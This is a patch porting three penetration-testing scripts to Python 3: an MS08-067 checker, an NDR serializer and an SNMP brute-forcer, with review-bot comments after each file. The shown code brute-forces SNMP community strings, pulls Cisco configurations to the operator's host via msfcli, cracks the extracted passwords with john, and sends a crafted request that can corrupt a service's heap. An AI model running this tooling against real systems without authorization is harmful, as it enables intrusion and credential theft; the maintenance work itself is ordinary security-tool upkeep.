From: Sophie Brun <[email protected]>
Date: Tue, 17 Sep 2019 12:01:32 +0200
Subject: Switch to Python 3
Last-update: 2019-09-17
Description: use 2to3 to convert the scripts for Python3.
---
ms08-067_check.py | 70 +++++++++++++++----------------
ndr.py | 38 ++++++++---------
snmpbrute.py | 120 +++++++++++++++++++++++++++---------------------------
3 files changed, 114 insertions(+), 114 deletions(-)
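diff --git a/ms08-067_check.py b/ms08-067_check.py
index f2b0281..414f345 100644
--- a/ms08-067_check.py
+++ b/ms08-067_check.py
@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
 
 '''
 Name: Microsoft Server Service Remote Path Canonicalization Stack Overflow Vulnerability
@@ -53,16 +53,16 @@ try:
 from impacket import uuid
 from impacket.dcerpc.v5 import dcerpc
 from impacket.dcerpc.v5 import transport
-except ImportError, _:
- print 'ERROR: this tool requires python-impacket library to be installed, get it '
- print 'from http://oss.coresecurity.com/projects/impacket.html or apt-get install python-impacket'
+except ImportError as _:
+ print('ERROR: this tool requires python-impacket library to be installed, get it ')
+ print('from http://oss.coresecurity.com/projects/impacket.html or apt-get install python-impacket')
 sys.exit(1)
 
 try:
 from ndr import *
-except ImportError, _:
- print 'ERROR: this tool requires python-pymsrpc library to be installed, get it '
- print 'from http://code.google.com/p/pymsrpc/'
+except ImportError as _:
+ print('ERROR: this tool requires python-pymsrpc library to be installed, get it ')
+ print('from http://code.google.com/p/pymsrpc/')
 sys.exit(1)
 
 
@@ -94,11 +94,11 @@ class MS08_067(Thread):
 s.connect((self.target, self.__port))
 s.close()
 
- except socket.timeout, _:
- raise connectionException, 'connection timeout'
+ except socket.timeout as _:
+ raise connectionException('connection timeout')
 
- except socket.error, _:
- raise connectionException, 'connection refused'
+ except socket.error as _:
+ raise connectionException('connection refused')
 
 
 def __connect(self):
@@ -111,12 +111,12 @@ class MS08_067(Thread):
 self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)
 self.__trans.connect()
 
- except smb.SessionError, _:
- raise connectionException, 'access denied (RestrictAnonymous is probably set to 2)'
+ except smb.SessionError as _:
+ raise connectionException('access denied (RestrictAnonymous is probably set to 2)')
 
 except:
 #raise Exception, 'unhandled exception (%s)' % format_exc()
- raise connectionException, 'unexpected exception'
+ raise connectionException('unexpected exception')
 
 
 def __bind(self):
@@ -130,12 +130,12 @@ class MS08_067(Thread):
 
 self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
 
- except socket.error, _:
- raise connectionException, 'unable to bind to SRVSVC endpoint'
+ except socket.error as _:
+ raise connectionException('unable to bind to SRVSVC endpoint')
 
 except:
 #raise Exception, 'unhandled exception (%s)' % format_exc()
- raise connectionException, 'unexpected exception'
+ raise connectionException('unexpected exception')
 
 
 def __forgePacket(self):
@@ -153,7 +153,7 @@ class MS08_067(Thread):
 );
 '''
 
- self.__path = ''.join([choice(letters) for _ in xrange(0, 3)])
+ self.__path = ''.join([choice(letters) for _ in range(0, 3)])
 
 self.__request = ndr_unique(pointer_value=0x00020000, data=ndr_wstring(data='')).serialize()
 self.__request += ndr_wstring(data='\\%s\\..\\%s' % ('A'*5, self.__path)).serialize()
@@ -182,9 +182,9 @@ class MS08_067(Thread):
 
 def result(self):
 if CMDLINE == True and self.status in ('VULNERABLE', 'not vulnerable'):
- print '%s: %s' % (self.target, self.status)
+ print('%s: %s' % (self.target, self.status))
 elif CMDLINE == True and SILENT != True:
- print '%s: %s' % (self.target, self.status)
+ print('%s: %s' % (self.target, self.status))
 
 
 def run(self):
@@ -192,7 +192,7 @@ class MS08_067(Thread):
 self.__checkPort()
 self.__connect()
 self.__bind()
- except connectionException, e:
+ except connectionException as e:
 self.status = e
 self.result()
 return None
@@ -226,10 +226,10 @@ if __name__ == '__main__':
 (args, _) = parser.parse_args()
 
 if not args.descr and not args.target and not args.list:
- print usage
+ print(usage)
 sys.exit(1)
 
- except (OptionError, TypeError), e:
+ except (OptionError, TypeError) as e:
 parser.error(e)
 
 descr = args.descr
@@ -239,14 +239,14 @@ if __name__ == '__main__':
 SILENT = args.silent
 
 if descr:
- print __doc__
+ print(__doc__)
 sys.exit(0)
 
 if tList:
 try:
 fd = open(tList, 'r')
 except IOError:
- print 'ERROR: unable to read targets list file \'%s\'' % tList
+ print('ERROR: unable to read targets list file \'%s\'' % tList)
 sys.exit(1)
 
 for line in fd.readlines():
@@ -256,22 +256,22 @@ if __name__ == '__main__':
 targets.add(target)
 
 if not targets:
- print 'ERROR: no targets specified'
+ print('ERROR: no targets specified')
 sys.exit(1)
 
 targets = list(targets)
 targets.sort()
 
 if not SILENT:
- print
- print '***********************************************************************'
- print '* On Windows XP SP2 and SP3 this check might lead to a race condition *'
- print '* and heap corruption in the svchost.exe process, but it may not *'
- print '* crash the service immediately, it can trigger later on inside any *'
- print '* of the shared services in the process. *'
- print '***********************************************************************'
- print
- answer = raw_input('Do you want to continue? [Y/n] ')
+ print()
+ print('***********************************************************************')
+ print('* On Windows XP SP2 and SP3 this check might lead to a race condition *')
+ print('* and heap corruption in the svchost.exe process, but it may not *')
+ print('* crash the service immediately, it can trigger later on inside any *')
+ print('* of the shared services in the process. *')
+ print('***********************************************************************')
+ print()
+ answer = input('Do you want to continue? [Y/n] ')
 
 if answer and answer[0].lower() != 'y':
 sys.exit(1)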
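Review bot: In the `__forgePacket` hunk, `choice(letters)` is carried over with only `xrange` changed to `range`; if `letters` is imported from `string` (the import is outside the hunks shown), that name does not exist in Python 3 and 2to3 does not rewrite it, so the check would fail before any request is built. The import should become `from string import ascii_letters` and this line `''.join([choice(ascii_letters) for _ in range(0, 3)])`. The two lines below it concatenate the results of `ndr_unique(...).serialize()` and `ndr_wstring(...).serialize()`, which should be checked for str/bytes mixing once ndr.py runs on Python 3. `__forgePacket` starts and ends outside the hunk.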
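diff --git a/ndr.py b/ndr.py
index 7d13bf9..9e8620b 100644
--- a/ndr.py
+++ b/ndr.py
@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
 
 '''
 This file is part of the PyMSRPC project and is licensed under the
@@ -72,23 +72,23 @@ class ndr_container(object):
 return self.align_byte * ((4 - (len(data) & 3)) & 3)
 
 def add_static(self, obj):
- if DEBUG: print "[*] add_static",
+ if DEBUG: print("[*] add_static", end=' ')
 
 if not self.parent:
- if DEBUG: print "self"
+ if DEBUG: print("self")
 self.s.append(obj)
 else:
- if DEBUG: print "parent"
+ if DEBUG: print("parent")
 self.parent.add_static(obj)
 
 def add_deferred(self, obj):
- if DEBUG: print "[*] add_deferred",
+ if DEBUG: print("[*] add_deferred", end=' ')
 
 if not self.parent:
- if DEBUG: print "self"
+ if DEBUG: print("self")
 self.d.append(obj)
 else:
- if DEBUG: print "parent"
+ if DEBUG: print("parent")
 self.parent.add_deferred(obj)
 
 def serialize(self):
@@ -795,14 +795,14 @@ class ndr_union:
 serialdata = ""
 
 switch = self.switch_dep.get_data()
- if self.elements.has_key(switch):
+ if switch in self.elements:
 serialdata += self.switch_dep.serialize()
 
 # Pack our requested enum
 serialdata += self.elements[switch].serialize()
 else:
 # This allows us to pick a switch for the user
- newswitch = self.elements.keys()[0]
+ newswitch = list(self.elements.keys())[0]
 
 # We need to update our original switch_dep so it passes correlation checks
 self.switch_dep.set_data(newswitch)
@@ -973,7 +973,7 @@ class ndr_struct(ndr_container):
 if element.name == name:
 return element
 except:
- if DEBUG: print "[*] Couldnt get name of element"
+ if DEBUG: print("[*] Couldnt get name of element")
 
 return False
 
@@ -984,7 +984,7 @@ class ndr_struct(ndr_container):
 return self.size
 
 def serialize(self):
- if DEBUG: print "[*] Serializing ndr_struct"
+ if DEBUG: print("[*] Serializing ndr_struct")
 
 # First we take care of our list serializing all containers first, and adding primitives verbatim
 for e in self.elements:
@@ -996,7 +996,7 @@ class ndr_struct(ndr_container):
 
 # If we are the top-most structure lets package it all
 if not self.parent:
- if DEBUG: print "[*] Packaging top most struct %s" % self.name
+ if DEBUG: print("[*] Packaging top most struct %s" % self.name)
 
 self.add_static(ndr_pad())
 
@@ -1036,7 +1036,7 @@ class ndr_array(ndr_container):
 self.add_static(self.basetype)
 
 if not self.parent:
- if DEBUG: print "[*] Packaging top most array %s" % self.name
+ if DEBUG: print("[*] Packaging top most array %s" % self.name)
 
 while len(self.d):
 d = self.d.pop(0)
@@ -1086,7 +1086,7 @@ class ndr_array_fixed(ndr_array):
 return self.count
 
 def serialize(self):
- if DEBUG: print "[*] Serializing ndr_array"
+ if DEBUG: print("[*] Serializing ndr_array")
 
 if self.cptr == 1:
 self.add_static(ndr_long(data=0x41424344))
@@ -1117,7 +1117,7 @@ class ndr_array_conformant(ndr_array):
 return self.size
 
 def serialize(self):
- if DEBUG: print "[*] Serializing ndr_array_conformant"
+ if DEBUG: print("[*] Serializing ndr_array_conformant")
 
 if self.cptr == 1:
 self.add_static(ndr_long(data=0x41424344))
@@ -1144,7 +1144,7 @@ class ndr_array_conformant(ndr_array):
 elif self.cmod[0] == "*":
 num *= self.cmod[1]
 else:
- print "[!] Problem with operator %s" % self.cmod[0]
+ print("[!] Problem with operator %s" % self.cmod[0])
 sys.exit(-1)
 
 self.add_static(ndr_long(data=num))
@@ -1196,7 +1196,7 @@ class ndr_array_varying(ndr_array):
 elif self.cmod[0] == "*":
 num *= self.cmod[1]
 else:
- print "[!] Problem with operator %s" % self.cmod[0]
+ print("[!] Problem with operator %s" % self.cmod[0])
 sys.exit(-1)
 
 # Pack our array count
@@ -1252,7 +1252,7 @@ class ndr_array_conformant_varying(ndr_array):
 elif self.mmod[0] == "*":
 mnum *= self.mmod[1]
 else:
- print "[!] Problem with operator %s" % self.mmod[0]
+ print("[!] Problem with operator %s" % self.mmod[0])
 sys.exit(-1)
 
 # Pack conformant info
@@ -1278,7 +1278,7 @@ class ndr_array_conformant_varying(ndr_array):
 elif self.pmod[0] == "*":
 pnum *= self.pmod[1]
 else:
- print "[!] Problem with operator %s" % self.pmod[0]
+ print("[!] Problem with operator %s" % self.pmod[0])
 sys.exit(-1)
 
 # Add varying count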
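Review bot: `serialdata = ""` in the `ndr_union` hunk still starts from a text string, which 2to3 leaves alone; if the element `serialize()` methods return packed binary data (their bodies are outside the hunks shown), every `serialdata += ...serialize()` raises `TypeError` on Python 3. Assuming they do return bytes, the accumulator should be `serialdata = b""`, and the other serializers in this file need the same audit, since a syntax-only conversion will import cleanly and then fail at the first request. A smaller point in the same hunk: `list(self.elements.keys())[0]` can be written `next(iter(self.elements))`, which avoids building a throwaway list. The enclosing method starts and ends outside the hunk.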
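diff --git a/snmpbrute.py b/snmpbrute.py
index 3e13709..f7d58d0 100644
--- a/snmpbrute.py
+++ b/snmpbrute.py
@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
 # SNMP Bruteforce & Enumeration Script
 # Requires metasploit, snmpwalk, snmpstat and john the ripper
 __version__ = 'v1.0b'
@@ -8,7 +8,7 @@ from time import sleep
 import optparse, sys, os
 from subprocess import Popen, PIPE
 import struct
-import threading, thread
+import threading, _thread
 import tempfile
 
 from scapy.all import (SNMP, SNMPnext, SNMPvarbind, ASN1_OID, SNMPget, ASN1_DECODING_ERROR, ASN1_NULL, ASN1_IPADDRESS,
@@ -219,7 +219,7 @@ class SNMPResults:
 ##########################################################################################################
 
 # for color output
-BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(8)
+BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = list(range(8))
 
 #following from Python cookbook, #475186
 def has_colours(stream):
@@ -243,7 +243,7 @@ def printout(text, colour=WHITE):
 sys.stdout.write(seq)
 else:
 #sys.stdout.write(text)
- print text
+ print(text)
 
 
 ##########################################################################################################
@@ -252,16 +252,16 @@ def printout(text, colour=WHITE):
 
 def banner(art=True):
 if art:
- print >> sys.stderr, " _____ _ ____ _______ ____ __ "
- print >> sys.stderr, " / ___// | / / |/ / __ \\ / __ )_______ __/ /____ "
- print >> sys.stderr, " \\__ \\/ |/ / /|_/ / /_/ / / __ / ___/ / / / __/ _ \\"
- print >> sys.stderr, " ___/ / /| / / / / ____/ / /_/ / / / /_/ / /_/ __/"
- print >> sys.stderr, "/____/_/ |_/_/ /_/_/ /_____/_/ \\__,_/\\__/\\___/ "
- print >> sys.stderr, ""
- print >> sys.stderr, "SNMP Bruteforce & Enumeration Script " + __version__
- print >> sys.stderr, "http://www.secforce.com / nikos.vassakis <at> secforce.com"
- print >> sys.stderr, "###############################################################"
- print >> sys.stderr, ""
+ print(" _____ _ ____ _______ ____ __ ", file=sys.stderr)
+ print(" / ___// | / / |/ / __ \\ / __ )_______ __/ /____ ", file=sys.stderr)
+ print(" \\__ \\/ |/ / /|_/ / /_/ / / __ / ___/ / / / __/ _ \\", file=sys.stderr)
+ print(" ___/ / /| / / / / ____/ / /_/ / / / /_/ / /_/ __/", file=sys.stderr)
+ print("/____/_/ |_/_/ /_/_/ /_____/_/ \\__,_/\\__/\\___/ ", file=sys.stderr)
+ print("", file=sys.stderr)
+ print("SNMP Bruteforce & Enumeration Script " + __version__, file=sys.stderr)
+ print("http://www.secforce.com / nikos.vassakis <at> secforce.com", file=sys.stderr)
+ print("###############################################################", file=sys.stderr)
+ print("", file=sys.stderr)
 
 def listener(sock,results):
 while True:
@@ -363,17 +363,17 @@ def testSNMPWrite(results,options,OID='.1.3.6.1.2.1.1.4.0'):
 continue
 
 def generic_snmpwalk(snmpwalk_args,oids):
- for key, val in oids.items():
+ for key, val in list(oids.items()):
 try:
 printout(('################## Enumerating %s Table using: %s (%s)'%(key,val[0],val[1])),YELLOW)
 entry={}
 out=os.popen('snmpwalk'+snmpwalk_args+' '+val[0]+' '+' | cut -d\'=\' -f 2').readlines()
 
- print '\tINFO'
- print '\t----\t'
+ print('\tINFO')
+ print('\t----\t')
 for i in out:
- print '\t',i.strip()
- print '\n'
+ print('\t',i.strip())
+ print('\n')
 except KeyboardInterrupt:
 pass
 
@@ -400,17 +400,17 @@ def enumerateSNMPWalk(result,options):
 
 printout('################## Enumerating Routing Table (snmpwalk)',YELLOW)
 try:
- for key, val in RouteOIDS.items(): #Enumerate Routes
+ for key, val in list(RouteOIDS.items()): #Enumerate Routes
 #print '\t *',val[1], val[0]
 out=os.popen('snmpwalk'+snmpwalk_args+' '+val[0]+' '+'| awk \'{print $NF}\' 2>&1').readlines()
 
 entry[val[1]]=out
 
 
- print '\tDestination\t\tNext Hop\tMask\t\t\tMetric\tInterface\tType\tProtocol\tAge'
- print '\t-----------\t\t--------\t----\t\t\t------\t---------\t----\t--------\t---'
+ print('\tDestination\t\tNext Hop\tMask\t\t\tMetric\tInterface\tType\tProtocol\tAge')
+ print('\t-----------\t\t--------\t----\t\t\t------\t---------\t----\t--------\t---')
 for j in range(lines):
- print( '\t'+entry['Destination'][j].strip().ljust(12,' ') +
+ print(( '\t'+entry['Destination'][j].strip().ljust(12,' ') +
 '\t\t'+entry['Next Hop'][j].strip().ljust(12,' ') +
 '\t'+entry['Mask'][j].strip().ljust(12,' ') +
 '\t\t'+entry['Metric'][j].strip().center(6,' ') +
@@ -418,13 +418,13 @@ def enumerateSNMPWalk(result,options):
 '\t'+entry['Route type'][j].strip().center(4,' ') +
 '\t'+entry['Route protocol'][j].strip().center(8,' ') +
 '\t'+entry['Route age'][j].strip().center(3,' ')
- )
+ ))
 except KeyboardInterrupt:
 pass
 
 ############################################################### Enumerate Arp
- print '\n'
- for key, val in ARPOIDS.items():
+ print('\n')
+ for key, val in list(ARPOIDS.items()):
 try:
 printout(('################## Enumerating ARP Table using: %s (%s)'%(val[0],val[1])),YELLOW)
 entry={}
@@ -437,40 +437,40 @@ def enumerateSNMPWalk(result,options):
 entry['IP']=out[2*lines:3*lines]
 
 
- print '\tIP\t\tMAC\t\t\tV'
- print '\t--\t\t---\t\t\t--'
+ print('\tIP\t\tMAC\t\t\tV')
+ print('\t--\t\t---\t\t\t--')
 for j in range(lines):
- print( '\t'+entry['IP'][j].strip().ljust(12,' ') +
+ print(( '\t'+entry['IP'][j].strip().ljust(12,' ') +
 '\t'+entry['MAC'][j].strip().ljust(18,' ') +
 '\t'+entry['V'][j].strip().ljust(2,' ')
- )
- print '\n'
+ ))
+ print('\n')
 except KeyboardInterrupt:
 pass
 
 ############################################################### Enumerate SYSTEM
- for key, val in OIDS.items():
+ for key, val in list(OIDS.items()):
 try:
 printout(('################## Enumerating %s Table using: %s (%s)'%(key,val[0],val[1])),YELLOW)
 entry={}
 out=os.popen('snmpwalk'+snmpwalk_args+' '+val[0]+' '+' | cut -d\'=\' -f 2').readlines()
 
- print '\tINFO'
- print '\t----\t'
+ print('\tINFO')
+ print('\t----\t')
 for i in out:
- print '\t',i.strip()
- print '\n'
+ print('\t',i.strip())
+ print('\n')
 except KeyboardInterrupt:
 pass
 ############################################################### Enumerate Interfaces
- for key, val in snmpstat_args.items():
+ for key, val in list(snmpstat_args.items()):
 try:
 printout(('################## Enumerating %s Table using: %s (%s)'%(key,val[0],val[1])),YELLOW)
 out=os.popen('snmpnetstat'+snmpwalk_args+' '+val[0]).readlines()
 
 for i in out:
- print '\t',i.strip()
- print '\n'
+ print('\t',i.strip())
+ print('\n')
 except KeyboardInterrupt:
 pass
 
@@ -480,7 +480,7 @@ def get_cisco_config(result,options):
 identified_ip=os.popen('ifconfig eth0 |grep "inet addr:" |cut -d ":" -f 2 |awk \'{ print $1 }\'').read()
 
 if options.interactive:
- Local_ip = raw_input('Enter Local IP ['+str(identified_ip).strip()+']:') or identified_ip.strip()
+ Local_ip = input('Enter Local IP ['+str(identified_ip).strip()+']:') or identified_ip.strip()
 else:
 Local_ip = identified_ip.strip()
 
@@ -490,26 +490,26 @@ def get_cisco_config(result,options):
 p=Popen('msfcli auxiliary/scanner/snmp/cisco_config_tftp RHOSTS='+str(result.addr[0])+' LHOST='+str(Local_ip)+' COMMUNITY="'+result.community+'" OUTPUTDIR=./output RETRIES=1 RPORT='+str(result.addr[1])+' THREADS=5 VERSION='+result.version.replace('v','')+' E ',shell=True,stdin=PIPE,stdout=PIPE, stderr=PIPE) #>/dev/null 2>&1
 
 
- print 'msfcli auxiliary/scanner/snmp/cisco_config_tftp RHOSTS='+str(result.addr[0])+' LHOST='+str(Local_ip)+' COMMUNITY="'+result.community+'" OUTPUTDIR=./output RETRIES=1 RPORT='+str(result.addr[1])+' THREADS=5 VERSION='+result.version.replace('v','')+' E '
+ print('msfcli auxiliary/scanner/snmp/cisco_config_tftp RHOSTS='+str(result.addr[0])+' LHOST='+str(Local_ip)+' COMMUNITY="'+result.community+'" OUTPUTDIR=./output RETRIES=1 RPORT='+str(result.addr[1])+' THREADS=5 VERSION='+result.version.replace('v','')+' E ')
 
 out=[]
 while p.poll() is None:
 line=p.stdout.readline()
 out.append(line)
- print '\t',line.strip()
+ print('\t',line.strip())
 
 printout('################## Passwords Found:',YELLOW)
 encrypted=[]
 for i in out:
 if "Password" in i:
- print '\t',i.strip()
+ print('\t',i.strip())
 if "Encrypted" in i:
 encrypted.append(i.split()[-1])
 
 if encrypted:
- print '\nCrack encrypted password(s)?'
+ print('\nCrack encrypted password(s)?')
 for i in encrypted:
- print '\t',i
+ print('\t',i)
 
 #if (False if raw_input("(Y/n):").lower() == 'n' else True):
 if not get_input("(Y/n):",'n',options):
@@ -520,17 +520,17 @@ def get_cisco_config(result,options):
 
 p=Popen('john ./hashes',shell=True,stdin=PIPE,stdout=PIPE,stderr=PIPE)
 while p.poll() is None:
- print '\t',p.stdout.readline()
- print 'Passwords Cracked:'
+ print('\t',p.stdout.readline())
+ print('Passwords Cracked:')
 out=os.popen('john ./hashes --show').readlines()
 for i in out:
- print '\t', i.strip()
+ print('\t', i.strip())
 
 out=[]
 while p.poll() is None:
 line=p.stdout.readline()
 out.append(line)
- print '\t',line.strip()
+ print('\t',line.strip())
 
 def select_community(results,options):
 default=None
@@ -553,7 +553,7 @@ def select_community(results,options):
 return
 
 if options.interactive:
- selection=raw_input("Select Community to Enumerate ["+str(default)+"]:")
+ selection=input("Select Community to Enumerate ["+str(default)+"]:")
 if not selection:
 selection=default
 else:
@@ -578,7 +578,7 @@ def SNMPenumeration(result,options):
 if getcisco:
 get_cisco_config(result,options)
 except KeyboardInterrupt:
- print '\n'
+ print('\n')
 return
 
 def password_brutefore(options, communities, ips):
@@ -615,7 +615,7 @@ def password_brutefore(options, communities, ips):
 while True:
 try:
 try:
- community=raw_input().strip('\n')
+ community=input().strip('\n')
 for ip in ips:
 SNMPsend(s, packets, ip, options.port, community, options.rate)
 except EOFError:
@@ -624,7 +624,7 @@ def password_brutefore(options, communities, ips):
 break
 
 try:
- print "Waiting for late packets (CTRL+C to stop)"
+ print("Waiting for late packets (CTRL+C to stop)")
 sleep(options.timeOut+options.delay) #Waiting in case of late response
 except KeyboardInterrupt:
 pass
@@ -642,12 +642,12 @@ def get_input(string,non_default_option,options):
 #(True if raw_input("Enumerate with different community? (Y/n):").lower() == 'n' else False)
 
 if options.interactive:
- if raw_input(string).lower() == non_default_option:
+ if input(string).lower() == non_default_option:
 return True
 else:
 return False
 else:
- print string
+ print(string)
 return False
 
 def main():
@@ -708,7 +708,7 @@ def main():
 with open(options.lfile) as t:
 ips = t.read().splitlines() #Potential DoS
 except:
- print "Could not open targets file: " + options.lfile
+ print("Could not open targets file: " + options.lfile)
 exit(0)
 else:
 ips.append(options.ip)
@@ -739,9 +739,9 @@ def main():
 results=[]
 
 if options.stdin:
- print >> sys.stderr, "Reading input for community strings ..."
+ print("Reading input for community strings ...", file=sys.stderr)
 else:
- print >> sys.stderr, "Trying %d community strings ..." % len(communities)
+ print("Trying %d community strings ..." % len(communities), file=sys.stderr)
 
 if options.sploitego: #sploitego method of bruteforce
 if ips:
@@ -755,7 +755,7 @@ def main():
 r.version=version
 r.community=i
 results.append(r)
- print ip, version+'\t',result
+ print(ip, version+'\t',result)
 else:
 parser.print_help()
 
@@ -783,7 +783,7 @@ def main():
 if not options.enum:
 select_community(results,options)
 
- print "Finished!"
+ print("Finished!")
 
 if __name__ == "__main__":
 main()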
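Review bot: In `get_cisco_config`, `p.stdout.readline()` returns `bytes` on Python 3 because both `Popen(...)` calls open their pipes in binary mode, so `if "Password" in i:` and `if "Encrypted" in i:` raise `TypeError` and the `print('\t',line.strip())` loops print `b'...'` reprs. Opening the pipes in text mode fixes this, for example by adding `universal_newlines=True` to both `Popen(...)` calls. Separately, the `msfcli` command line is built by concatenating `result.community`, `result.addr` and `Local_ip` and is run with `shell=True`, so a value containing shell metacharacters is interpreted by the local shell; an argument list without `shell=True`, or `shlex.quote()` around each interpolated value, is the safer form. The same holds for the `os.popen('snmpwalk'+snmpwalk_args+...)` calls in the `generic_snmpwalk` and `enumerateSNMPWalk` hunks. These function bodies start or end outside the hunks shown.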